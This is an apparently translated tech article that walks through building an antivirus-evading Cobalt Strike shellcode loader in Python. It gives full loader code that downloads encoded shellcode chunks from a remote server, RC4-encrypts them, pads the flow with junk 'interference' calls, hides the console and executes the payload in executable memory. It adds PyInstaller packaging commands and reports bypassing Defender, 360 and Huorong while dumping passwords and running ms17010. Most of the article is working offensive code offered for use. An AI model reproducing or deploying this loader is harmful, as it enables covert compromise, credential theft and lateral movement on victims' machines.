Shulou (Shulou.com), SLTechnology News&Howtos > Network Security. Report of 05/31, updated 2025-01-18.
This article explains in detail how to use Python to build an AV-evading (免杀) Cobalt Strike shellcode loader. The content is shared as a reference; after reading it you should have a basic understanding of the relevant principles.
1. What is shellcode
In an attack, shellcode is a small piece of code used as the payload when a software vulnerability is exploited. It is called "shellcode" because it traditionally launches a command shell from which the attacker controls the compromised machine, but any code that performs a similar task is also called shellcode. Because a payload is not limited to spawning a shell, some people consider the name imprecise; attempts to replace the term have not been widely adopted. Shellcode is normally written in machine code.
In short: shellcode is a piece of machine code that performs some action.
2. What is machine code
Baidu Baike explains it as follows: the statements of the language that a computer executes directly are machine instruction codes, sets of binary numbers that tell the computer which operation to perform and the address of the operands.
In short: machine code is the instruction encoding that the computer executes directly.
People replaced machine instruction codes with mnemonic symbols to form assembly language, and later developed various high-level languages to make programming easier. However, code written in assembly or in any procedural or object-oriented high-level language is ultimately converted into the corresponding machine code by a translator or compiler before the computer can run it, because the computer only understands machine code.
3. What is shellcode loader
In plain words: a shellcode loader is the code that loads the shellcode into memory and runs it.
C/C++ loading method
```c
#include "pch.h"
#include <windows.h>   /* VirtualAlloc, LPVOID, memory constants */
#include <string.h>    /* memcpy */
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")  /* do not display a window */

unsigned char shellcode[] = "\xfc\xe8\x89\x00\x00\x60\x89\xe5...";

void main()
{
    /* allocate a readable, writable and executable region the size of the shellcode */
    LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (Memory == NULL) {
        return;
    }
    /* copy the shellcode into the region and call it as a function */
    memcpy(Memory, shellcode, sizeof(shellcode));
    ((void (*)())Memory)();
}
```
Python loading method
```python
#!/usr/bin/python
import ctypes

shellcode = bytearray("\xfc\xe8\x89\x00\x60\x89...")
# allocate memory: 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000), ctypes.c_int(0x40))
# copy the shellcode into the allocated region
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))
# start a thread at the shellcode address and wait for it to finish
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr),
                                         ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
```
Of course, a shellcode loader can be written in many languages: assembly, Go, C#, and many others. They are not all listed here; instead, let's move on to writing a shellcode loader in Python that gets past both static and dynamic detection by antivirus software.
Why use python
Python has a low entry barrier and is easy to pick up, and this kind of AV-evasion method appeared two or three years ago. Many people say the code published on the Internet is already detected. Is that really so? Have you ever sat down and written the code yourself, understood the relevant principles, used those principles to think further, and fuzzed through the code? If not, your Cobalt Strike and Metasploit are only fit to sit there gathering dust. Blame me, then. Enough nonsense; let's get to the point.
Environmental preparation
1. python-2.7.17.amd64
Download address: https://www.python.org/ftp/python/2.7.17/python-2.7.17.amd64.msi
2. pywin32-227.win-amd64-py2.7
Download address: https://github.com/mhammond/pywin32/releases
3. PyInstaller 3.0
Download address: https://github.com/pyinstaller/pyinstaller/releases
4. Brief notes:
This combination of versions is the result of my own repeated experiments and personal preference; the installation steps are not repeated here. If you cannot even manage that, you had better let Cobalt Strike and Metasploit sit there gathering dust. Personal advice: first, do not install PyInstaller with pip; try it a few times and you will see how troublesome the various compatibility issues are. Second, if you also have a Python 3 environment and want to avoid trouble, set this environment up separately in a virtual machine, because having Python 2 and Python 3 side by side takes some fiddling, with pitfalls such as keeping pip2 and pip3 apart. Those willing to tinker can refer to the following articles:
https://blog.csdn.net/zydz/article/details/78121936
https://blog.csdn.net/C_chuxin/article/details/82962797
https://blog.csdn.net/qq_34444097/article/details/103027906
0x05 AV-evasion principles
1. The shellcode string is not hard-coded (in plain words: the shellcode string is not written into the code).
2. The shellcode string is obfuscated with several layers of encoding.
3. The shellcode string is encrypted.
4. Harmless code paths are added to the execution flow to disturb AV analysis (an evasion idea from the early years).
5. The shellcode generated by Cobalt Strike is a downloader: its main job is to download beacon.dll and load it into memory, and most of the functionality lives in the beacon. So the CS shellcode itself performs few dangerous actions; it is detected by antivirus software because AV vendors extract signatures from it with algorithms such as fuzzy hashing.
6. Cobalt Strike itself uses named pipes for inter-process communication.
At present there are three kinds of antivirus software: signature-based, behaviour-based, and cloud-based detection. Cloud detection can in practice be grouped with signature-based detection.
From my fuzzing, is dynamic (behavioural) detection really hard to get past? The answer is no. Cobalt Strike's named-pipe communication, combined with the "add harmless code" idea at the high-level-language level (that is, adding ordinary code to the shellcode loader so the exe itself performs normal actions that confuse the AV's judgement), is effective, provided we build on the advantage of Cobalt Strike's pipe communication. Is static detection easier to get past? Yes: shellcode that never touches disk, plus Cobalt Strike's own pipe communication, plus various combinations of encoding and encryption of the shellcode string. Cloud detection is roughly equivalent to signature detection and is passed the same way.
Summary: the rough and simple methods in this article all stand on the powerful shoulders of Cobalt Strike.
0x06 show you the code
```python
from ctypes import *
import ctypes
import sys, os, hashlib, time, base64
import random, string
import requests

# generate a random string; used to reduce static features
def GenPassword(length):
    numOfNum = random.randint(1, length - 1)  # second argument lost in extraction; length - 1 assumed
    numOfLetter = length - numOfNum
    slcNum = [random.choice(string.digits) for i in range(numOfNum)]
    slcLetter = [random.choice(string.ascii_letters) for i in range(numOfLetter)]
    slcChar = slcNum + slcLetter
    random.shuffle(slcChar)
    getPwd = ''.join([i for i in slcChar])
    return getPwd

# rc4 encryption/decryption; public_key defaults to a GenPassword() value to reduce features
def rc4(string, op='encode', public_key=GenPassword(7), expirytime=0):
    ckey_lenth = 4
    public_key = public_key and public_key or ''
    key = hashlib.md5(public_key).hexdigest()
    keya = hashlib.md5(key[0:16]).hexdigest()
    keyb = hashlib.md5(key[16:32]).hexdigest()
    keyc = ckey_lenth and (op == 'decode' and string[0:ckey_lenth]
                           or hashlib.md5(str(time.time())).hexdigest()[32 - ckey_lenth:32]) or ''
    cryptkey = keya + hashlib.md5(keya + keyc).hexdigest()
    key_lenth = len(cryptkey)  # 64
    string = (op == 'decode' and base64.b64decode(string[4:])
              or '0000000000' + hashlib.md5(string + keyb).hexdigest()[0:16] + string)
    string_lenth = len(string)
    result = ''
    box = list(range(256))
    randkey = []
    for i in xrange(256):
        randkey.append(ord(cryptkey[i % key_lenth]))
    # key scheduling
    j = 0
    for i in xrange(256):
        j = (j + box[i] + randkey[i]) % 256
        tmp = box[i]
        box[i] = box[j]
        box[j] = tmp
    # keystream generation and XOR
    a = j = 0
    for i in xrange(string_lenth):
        a = (a + 1) % 256
        j = (j + box[a]) % 256
        tmp = box[a]
        box[a] = box[j]
        box[j] = tmp
        result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]))
    if op == 'decode':
        if ((result[0:10] == '0000000000' or int(result[0:10]) - int(time.time()) > 0)
                and result[10:26] == hashlib.md5(result[26:] + keyb).hexdigest()[0:16]):
            return result[26:]
        else:
            return None
    else:
        return keyc + base64.b64encode(result)

# the following is the shellcode loader code
# the shellcode string is base64 encoded, then hex encoded, and split into three blocks;
# the encoded blocks are fetched from a server with GET requests
res1 = requests.get("http://xxx.xxx.xxx/code/Shellcode1.TXT")
res2 = requests.get("http://xxx.xxx.xxx/code/Shellcode2.TXT")
res3 = requests.get("http://xxx.xxx.xxx/code/Shellcode3.TXT")
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
whnd = ctypes.windll.kernel32.GetConsoleWindow()
rcpw = GenPassword(13)
# take the encoded shellcode string and encrypt it with rc4; the key comes from GenPassword()
# to reduce the features of the raw shellcode string
buf = rc4(base64.b64decode(res1.text + res2.text + res3.text).decode('hex'), 'encode', rcpw)
rc4(res2.text, 'encode', GenPassword(13))  # interference code
if whnd != 0:
    if GenPassword(6) != GenPassword(7):  # interference code
        ctypes.windll.use***.ShowWindow(whnd, 0)
        ctypes.windll.kernel32.CloseHandle(whnd)
# decrypt the shellcode
scode = bytearray(rc4(buf, 'decode', rcpw))
rc4(res2.text + res1.text, 'encode', GenPassword(13))  # interference code
# request readable, writable, non-executable memory
# (note: the code actually passes 0x40 = PAGE_EXECUTE_READWRITE, so the region is already executable)
memHscode = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(scode)),
                                                ctypes.c_int(0x3000), ctypes.c_int(0x40))
rc4(res1.text, 'encode', GenPassword(13))  # interference code
buf = (ctypes.c_char * len(scode)).from_buffer(scode)
old = ctypes.c_long(1)
# use VirtualProtect to make the shellcode block executable, the so-called progressive loading
VirtualProtect(memHscode, ctypes.c_int(len(scode)), 0x40, ctypes.byref(old))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memHscode), buf, ctypes.c_int(len(scode)))
fuck = rc4(GenPassword(7), 'encode', GenPassword(13))  # interference code
runcode = cast(memHscode, CFUNCTYPE(c_void_p))  # create a function pointer to the shellcode
fuck = rc4(GenPassword(7), 'encode', GenPassword(13))  # interference code
runcode()  # execute
```
0x07 compiles with PyInstaller
1. Compile without specifying an icon
```
python2 PyInstaller.py --noconsole --onefile cs\cs.py
```
2. Compile with an icon
```
python2 PyInstaller.py --noconsole --icon cs\icon.ico --onefile cs\cs.py
```
0x08 result test
1. Test environment
[Win10 Professional + Windows Defender] [Win7 Enterprise + 360 suite + Huorong] [ThreatBook cloud sandbox] [virustotal.com]
2. Static detection
3. ThreatBook cloud sandbox
4. virustotal
https://www.virustotal.com/gui/file/b19bdc96af2b885b3f77915761269a640c500b553dd1dd795145d090b9b64042/detection
Although the detection rate on virustotal.com is not very encouraging, for domestic products it is enough for daily needs.
5. Dynamic behavior detection
Tested on Win7 Enterprise with the 360 suite and Huorong all updated to the latest version.
Cobalt Strike came online successfully, and neither 360 nor Huorong blocked or prompted.
Of course, that by itself means little; next we see what happens when CS features are used.
1. logonpasswords
Everything is normal, with no interception or prompt from the AV.
2. View the list of processes
3. Screenshot
Of course, that is still nothing; next, something more exciting.
4. ms17010
ms17010 also ran smoothly, and the 360 suite + Huorong gave no interception or prompt.
5. Handing off to Metasploit
Win10 Professional + Windows Defender
Only at this point can we say: well, it is alright.
Attached: a VPS IP I once forgot to replace during testing.
Since the samples were uploaded to the ThreatBook cloud sandbox and virustotal.com, the major AV vendors will analyse them, extract signatures and study the defence. So it is recommended to test in a virtual machine you build yourself; otherwise your VPS IP will have to be changed (it will be flagged), and the technique you fuzzed will quickly be turned into a signature. Then why am I willing to show the code? Because even if the public code has a signature extracted, it will not be detected once you change it. It is as simple as that.
That is all on using Python to build an AV-evading CS shellcode loader. I hope the above content is of some help and that you learn more from it. If you think the article is good, share it for more people to see.